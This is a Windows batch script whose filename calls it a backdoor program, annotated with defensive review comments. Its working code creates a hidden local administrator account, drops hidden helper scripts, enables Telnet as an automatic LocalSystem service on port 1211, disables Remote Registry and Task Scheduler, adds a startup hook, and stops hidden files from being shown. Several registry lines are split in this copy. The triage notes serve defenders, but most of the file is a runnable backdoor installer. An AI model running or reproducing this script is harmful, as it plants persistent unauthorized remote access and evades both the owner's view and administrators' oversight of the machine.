📄 开后门程序.txt
@echo off
rem Review summary, written from a defensive reading of this script.
rem  - Takes two arguments, an account name and a password. With no arguments it only prints a usage line.
rem  - Writes a helper batch file winhm.bat and a script gnm.vbs under the Windows directory and marks both hidden, read-only and system.
rem  - The generated VBScript creates and activates a local account and adds it to the local Administrators group.
rem  - Imports a set of registry values through a temporary file named patch.dll, including a Telnet service key set to start automatically.
rem  - Feeds a fixed answer list to tlntadmn. The author's closing note says this opens Telnet on port 1211.
rem Artifacts worth checking during triage: winhm.bat, gnm.vbs, gnm.txt, patch.dll, the TlntSvr service key, and any unexpected member of the local Administrators group.
rem No first argument: jump to the usage message.
@if "%1" =="" goto user
rem If an earlier winhm.bat exists, clear its hidden, system and read-only attributes so it can be overwritten.
@IF NOT EXIST %systemroot%\winhm.bat goto nobat
@attrib -h -S -r %systemroot%\winhm.bat
:nobat
rem NOTE(review): the first write below uses the full systemroot path, but every appended line uses a bare winhm.bat after the cd into system32.
rem The helper content may therefore land in system32 rather than beside the first file. Check both locations when collecting artifacts.
@cd %systemroot%\system32\
@echo @echo off >%systemroot%\winhm.bat
rem The echoed lines make the helper rebuild the answer file gnm.txt, pipe it into tlntadmn with output discarded, then delete gnm.txt.
rem NOTE(review): the meaning of each menu answer depends on the tlntadmn version and is not stated here. Only the value 1211 is explained by the author, as the Telnet port.
@echo @echo 5 ^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 3 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 7 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 8 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 1211 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 4 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @cd %systemroot%\system32\ >>winhm.bat
@echo @tlntadmn^<gnm.txt ^>nul >>winhm.bat
@echo @del gnm.txt >>winhm.bat
@echo exit >>winhm.bat
rem Mark the helper hidden, read-only and system.
@attrib +h +r +S %systemroot%\winhm.bat
rem Same overwrite preparation for an existing gnm.vbs.
@IF NOT EXIST %systemroot%\system32\gnm.vbs goto novbs
@attrib -h -S -r %systemroot%\system32\gnm.vbs
:novbs
rem Generate gnm.vbs. Every run call passes window style 0, so no console window is shown.
rem The account name and password are placed on the net user command line, so process-creation logging that records command lines will capture them.
rem Detection: a local account creation followed by an addition to the local Administrators group, typically with a script host as the ancestor of cmd.exe and net.
@echo set wshshell=createobject ("wscript.shell") >%systemroot%\system32\gnm.vbs
@echo a=wshshell.run ("cmd.exe /c net user %1 %2 /add",0) >>%systemroot%\system32\gnm.vbs
@echo b=wshshell.run ("cmd.exe /c net user %1 /active:y",0) >>%systemroot%\system32\gnm.vbs
@echo c=wshshell.run ("cmd.exe /c net localgroup administrators %1 /add",0) >>%systemroot%\system32\gnm.vbs
@echo c=wshshell.run ("cmd.exe /c start %systemroot%\winhm.bat",0) >>%systemroot%\system32\gnm.vbs
@attrib +h +r +S %systemroot%\system32\gnm.vbs
rem Run the generated script immediately.
@start %systemroot%\system32\gnm.vbs
rem Build a registry import file. It is named patch.dll, but its first line is the regedit text header, so the extension does not match the content.
rem NOTE(review): several bracketed key lines and hex values below are split across two lines in this copy, apparently by the page it was taken from. They are left exactly as found.
@echo Windows Registry Editor Version 5.00 >patch.dll
rem lanmanserver parameters: both automatic administrative share values are set to 0.
@echo [hkey_local_machine\system\currentcontrolset\services\lanman
server\parameters] >>patch.dll
@echo "autoshareserver"=dword:00000000 >>patch.dll
@echo "autosharewks"=dword:00000000 >>patch.dll
rem lsa restrictanonymous is set to 1, then netbt smbdeviceenabled is set to 0.
@echo [hkey_local_machine\system\currentcontrolset\control\lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@echo [hkey_local_machine\system\currentcontrolset\services\netbt\
parameters] >>patch.dll
@echo "smbdeviceenabled"=dword:00000000 >>patch.dll
rem A service start value of 4 means disabled. It is applied to the remote registry and task scheduler service keys.
rem NOTE(review): disabling these also removes channels that administrators and responders commonly use for remote inspection. Confirm their state on an affected host.
@echo [hkey_local_machine\system\currentcontrolset\services\@remot
eregistry] >>patch.dll
@echo "start"=dword:00000004 >>patch.dll
@echo [hkey_local_machine\system\currentcontrolset\services\schedu
le] >>patch.dll
@echo "start"=dword:00000004 >>patch.dll
@echo [hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon] >>patch.dll
@echo "shutdownwithoutlogon"="0" >>patch.dll
rem TlntSvr service definition: ObjectName is LocalSystem, and a Start value of 2 means automatic start at boot.
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSv
r] >>patch.dll
@echo "DependOnService" =hex(7):52,00,70,00,63,00,53,00,73,00,00,00,54,00,63,00,70,0
0,\ >>patch.dll
@echo 49,00,70,00,00,00,00,00 >>patch.dll
@echo "Description"="允许远程用户登录到系统并且使用命令行运行控制台程序。" >>patch.dll
@echo "DisplayName"="Telnet" >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath" =hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,0
0,6f,00,\ >>patch.dll
@echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,
32,00,5c,00,74,\ >>patch.dll
@echo 00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,
00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSv
r\Enum] >>patch.dll
@echo "0"="Root\\LEGACY_TLNTSVR\\0000" >>patch.dll
@echo "Count"=dword:00000001 >>patch.dll
@echo "NextInstance"=dword:00000001 >>patch.dll
rem NOTE(review): dontdisplaylastusername has no key header of its own here, so as written it falls under the TlntSvr Enum key above.
@echo "dontdisplaylastusername"="1" >>patch.dll
rem Per-user Explorer policy values, including a value named run that points at gnm.vbs.
rem NOTE(review): the author's closing note says the account is set up again at every startup. Presumably this value is the hook for that. Verify on the affected host.
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer] >>patch.dll
@echo "NoDriveTypeAutoRun"=dword:00000091 >>patch.dll
@echo "run"="gnm.vbs" >>patch.dll
rem Rewrites the Explorer SHOWALL option for hidden files, with Checkedvalue set to 0.
rem NOTE(review): this looks like the familiar change that keeps the show hidden files setting from taking effect, which would keep the hidden artifacts out of view. Confirm before relying on Explorer to list files.
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Advanced\Folder\Hidden\SHOWALL] >>patch.dll
@echo "RegPath"=" Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adva
nced" >>patch.dll
@echo "Text"="@shell32.dll,-30500" >>patch.dll
@echo "Type"="radio" >>patch.dll
@echo "Checkedvalue"=dword:00000000 >>patch.dll
@echo "valueName"="Hidden" >>patch.dll
@echo "Defaultvalue"=dword:00000002 >>patch.dll
@echo "HKeyRoot"=dword:80000001 >>patch.dll
@echo "HelpID"="shell.hlp#51105" >>patch.dll
rem Silent import, then the import file is deleted. The file may not be recoverable afterwards, but the registry values remain.
@regedit /s patch.dll
@del patch.dll
rem The same answer sequence as in the helper, applied immediately, after which gnm.txt is deleted.
@echo 5 >%systemroot%\system32\gnm.txt
@echo 3 >>%systemroot%\system32\gnm.txt
@echo 7 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 8 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 1211 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@echo 4 >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@cd %systemroot%\system32\
@tlntadmn<gnm.txt >nul
@del gnm.txt
@goto end
:user
rem Usage path: print the expected argument form and wait for a key press.
@echo Example: "Name Password"
PAUSE >NUL
rem Author's note: run from the command line as a.bat username password
rem Author's note: the account you set is created automatically at every startup and TELNET is opened on port 1211; in addition
rem Author's note: there are some registry patches.
:end
@exit